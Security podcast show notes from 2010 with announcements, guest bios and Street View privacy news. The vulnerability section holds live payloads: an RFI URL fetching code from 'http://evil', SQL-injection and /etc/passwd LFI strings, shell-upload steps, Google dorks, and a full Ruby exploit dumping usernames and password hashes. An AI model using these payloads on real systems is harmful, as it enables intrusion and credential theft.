ISD Podcast Episode 120 for April 30, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security-related news, hopefully providing you a few laughs and a little knowledge.
Announcements: MyHardDriveDied.com:
MHDD Data Recovery Class current dates and locations:
Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the Discount Code: isdpod15 for a 15% discount.
Atlanta ISSA:
ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville, AL. Event is open to ISSA members at a discounted price ($35; full price is $50).
Friends of the Podcast:
Webhosting services: WebSpeedway
Interview with Jason Lawrence. Jason has been in the world of Security since 1996, supporting, designing and integrating Microsoft environments and diverse security infrastructures. He holds numerous industry certifications such as CISSP, CISA, GCFA and CEH. He has worked for a large Healthcare Provider in Israel as team lead in supporting and maintaining the organization’s system and security infrastructure. Currently he works for IBM Internet Security Systems as a Senior Support Engineer for the ISS product portfolio. Jason has also been involved with the ISSA for the past 6 years and currently is the Metro Atlanta Chapter’s Director of Communication. In his free time he mentors the SANS Forensics 508: Computer Forensic Investigations and Incident Response course.
ISD Podcast Episode 119 for April 29, 2010.
Announcements:
6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class). Apparently there have been some issues with the class RSVPs. As a result, they are working on either responding to the RSVPs, getting a bigger location or, as a last resort, saying sorry to those who don't get in.
Interview with Scott Moulton. Scott Moulton was the first person arrested for Port Scanning in January of 2000. During the defense, Scott found he had to train his lawyers on the technical aspects of computers in order to defend himself. This began his forensic computer career with a speciality in rebuilding hard drives for investigation purposes. Scott is the President at Forensic Strategy Services, LLC and the owner at My Hard Drive Died. Scott has presented at Shmoocon, OuterZ0ne, DEF CON and Toorcon, and is an active, consistent speaker with the DEF CON 404 Local Chapter.
ISD Podcast Episode 118 for April 28, 2010.
Interview with L. Taylor Banks, who is the owner at KnowThreat and Administrator and PoC of the Atlanta DEF CON group DC404. Taylor has been a speaker at DEF CON, Black Hat, ShmooCon, LayerOne, and numerous private events. If you are interested in learning about computing, be sure to check out Taylor's event Zero to Cloud in 48 Hours.
ISD Podcast Episode 117 for April 27, 2010.
Interview with Everett Washington Way Professional Services. Everett specializes in Security program building, with specific focus on Security Assessments and Audits. He has been instrumental in implementing Vulnerability and Risk Management Solutions. We get Everett to talk to us about his experiences and recommendations for building a successful Information Security program.
ISD Podcast Episode 116 for April 26, 2010.
Vulnerabilities of Interest:
Mp3 Online Id Tag Editor is subject to a Remote File Inclusion (RFI) vulnerability. Proof of Concept URLs are available: http://www.sample.com/mp3/velid3/module.archive.gzip.php?determined_format[include]=http://evil/exploit?
PhpMesFilms is subject to a SQL Injection vulnerability. Version 1.8 is impacted, though others may be as well. Proof of Concept URLs are available: http://www.sample.com/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10--
Multi-Mirror is subject to a Remote Upload vulnerability. Proof of Concept is available: Step 1 – http://www.sample.com/Multi-Mirror/ (Select Mirrors 2 upload file and select file 2 upload) Step 2 – http://www.sample.com/Multi-Mirror/temp_files (After Upload )
Mihalism Multi Host is subject to an Upload vulnerability. Version 4.0.0 is impacted, though others may be as well. Google Dork "inurl: Mihalis" Proof of Concept is available: Step 1 – http://www.sample.com/Mihalis/index.php (Use Tamper Data) Step 2 – http://www.sample.com/Mihalis/images/02j3gul0lkay3ggoz5ci.php (File Name)
Magic Uploader Mini is subject to an Upload vulnerability. Google Dork "inurl: miniuploader" Proof of Concept is available: Step 1 – http://www.sample.com/miniuploader/index.php (Use Tamper Data) Step 2 – http://www.sample.com/miniuploader/uploads/ (File Name)
Almnzm is subject to a SQL Injection vulnerability. Versions older than 2.1 are impacted, though others may be as well. Example URL is available: http://www.sample.com/index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20
Bild Flirt is subject to a SQL Injection vulnerability. Versions older than 1.0 are impacted, though others may be as well. Exploit code is available:

    #!/usr/bin/ruby
    #4004-security-project.com
    #Discovered and vulnerability by Easy Laster
    print "
    #########################################################
    #               4004-Security-Project                   #
    #########################################################
    #       Bild Flirt <= version 1.0 SQL Injection         #
    #                      Exploit                          #
    #               Using Host+Path+userid                  #
    #             www.demo.de /bildflirt/ 1                 #
    #                    Easy Laster                        #
    #########################################################
    "
    require 'net/http'
    print "#########################################################"
    print "\nEnter host name (site.com)->"
    host=gets.chomp
    print "#########################################################"
    print "\nEnter script path (/forum/)->"
    path=gets.chomp
    print "#########################################################"
    print "\nEnter script path (userid)->"
    userid=gets.chomp
    print "#########################################################"
    begin
      dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nThe Username is -> "+(/#####(.+)#####/).match(resp.body)[1]
      dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nMD5 Password Hash is -> "+(/#####(.+)#####/).match(resp.body)[1]
      print "\n#########################################################"
    rescue
      print "\nExploit failed"
    end
YUI Images Script is subject to a Shell Upload vulnerability. Version 1.0 is impacted, though others may be as well. Google Dork "inurl: YUI-upload". Example URLs are available: http://www.sample.com/YUI-upload/html (Upload shell .php.giff) http://www.sample.com/YUI-upload/html/files/ (Your Shell.php.giff)
Opentel Openmairie tel is subject to a Local File Inclusion (LFI) vulnerability. Version 1.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab". Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
Openstock Facture is subject to a Local File Inclusion (LFI) vulnerability. Version 2.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab". Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
iMesh is subject to a Buffer Overflow vulnerability. Versions older than 7.1.0.x are impacted, though others may be as well. Exploit code is available (milw0rm.com, 2007-12-18).
Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/
Google's roving Street View spycam may blur your face, but it's got your number. The Street View service is under fire in Germany for scanning private WLAN networks, and recording users' unique MAC (Media Access Control) addresses, as the car trundles along. Germany's Federal Commissioner for Data Protection Peter Schaar says he's "horrified" by the discovery. "I am appalled… I call upon Google to delete previously unlawfully collected personal data on the wireless network immediately and stop the rides for Street View," according to German broadcaster ARD. Spooks have long desired the ability to cross reference the MAC address of a user's connection with their real identity and virtual identity, such as their Gmail or Facebook account. Other companies have logged broadcasting WLAN networks and published the information. By contrast Google has not published the WLAN map, or Street View in Germany; Google hopes to launch the service by the end of the year. It has been publicly known since at least 2008 that companies like Skyhook equip test vehicles to record Wi-Fi networks. The company has for years offered its radio signal and mobile phone data to software developers. According to its own data, the company has mapped 80 million Wi-Fi locations worldwide. To that point, the first iPhone used the Skyhook technology to determine the approximate location of the phone using a number of wireless signals. The major difference here is that Skyhook technology is not made public.
News item 2: http://www.guardian.co.uk/technology/2010/apr/20/google-google-street-view
Google has hit out at state attempts to clamp down on the internet by revealing governments' requests to remove data from the web and get information about users. Tonight it released a web page with a map showing country by country where it has had government requests or court orders to remove content from the YouTube video service or its search results, or to provide details about users of its services. The release of the tool, announced on its official blog, comes as it has had to counter complaints from data protection authorities in 10 countries, including the UK, that its Street View product, which provides pictures of public streets, and its ad-hoc social networking service Buzz "were launched without due consideration of privacy and data protection laws" and that Buzz in particular "betrayed a disappointing disregard for fundamental privacy norms". Details provided by Google cover requests between 1 July and 31 December 2009, and show that in the UK there were 1,166 requests for data about users and 59 requests to remove web pages in Google's services such as YouTube, or from its search results for the web. It complied with 45, or 76%, of the 59 requests, of which 43 were about YouTube videos. It does not specify which government agency – such as the police or others – made the request.